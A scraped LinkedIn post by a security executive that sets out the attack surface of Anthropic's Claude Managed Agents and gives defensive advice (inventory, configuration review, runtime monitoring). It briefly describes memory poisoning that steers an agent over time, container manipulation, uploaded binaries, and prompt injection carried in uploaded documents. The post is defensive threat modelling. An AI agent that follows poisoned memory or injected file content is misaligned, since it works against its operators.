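Pinning only helps if someone re-verifies the SHA when bumping versions, which is why the trailing `# v4.x` comment convention exists: tooling like Dependabot updates both together, and a reviewer can see what the hash is supposed to correspond to.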

  • Jason Rebholz

    Securing the agentic workforce | Co-founder & CEO at Evoke Security | Former CISO & IR leader

    32,429 followers

    The most repeatable pattern ever. Anthropic drops a new feature, I get excited, then read the docs, and facepalm. And no, this isn't a post about Mythos. My latest deep dive: Claude Managed Agents. It's genuinely impressive. It's Anthropic's way of lifting the infrastructure burden of operating long-running agents. It helps you manage everything you need, from the agent to the container it runs in. It even has a new credential vault to help protect your MCP credentials. But new features = new attack surface. I'll spare you the deep dive into the architecture. You can check the blog for those details. Instead, I'll skip straight to the risks that stood out to me:

    Memory poisoning: Agents can have persistent memory that survives across sessions. Great from an agent productivity standpoint. Also, a prime target for attackers who want to quietly influence an agent's behavior over time.
    Environment manipulation: The preconfigured container is the foundation on which everything runs. If an attacker can touch it, they can control a lot from there.
    Binary execution: You can upload and execute binary files in the environment. The history of web application security has a lot to say about what happens when you let users upload files without checking if they're malicious. Oh, and the environment containers also have SSH and SCP by default. No attacker has ever used those for malicious purposes, ever…oh, wait…
    Malicious documents: Agents can read uploaded files. That's another door for prompt injection to walk through.

    This doesn't mean you shouldn't use Managed Agents. It means deploy with the right controls and visibility. Here's what to do right now:
    1. Get an inventory: What agents, environments, and sessions are already running? Your cloud infrastructure just expanded into Anthropic's servers.
    2. Assess the configuration: What packages are installed? What network restrictions are in place? Is it locked down or a free-for-all?
    3. Establish runtime monitoring: You have a new place where agents are operating with zero visibility into them.

    Security teams are in an all-out sprint just to keep up with the pace of new features. The attack surface isn't waiting for anyone to catch up. If your team is experimenting with Managed Agents and wants to get ahead of this before it becomes an incident, shoot me a DM. Read the full blog with an overview of the features and risk: https://lnkd.in/eZEMU8XT
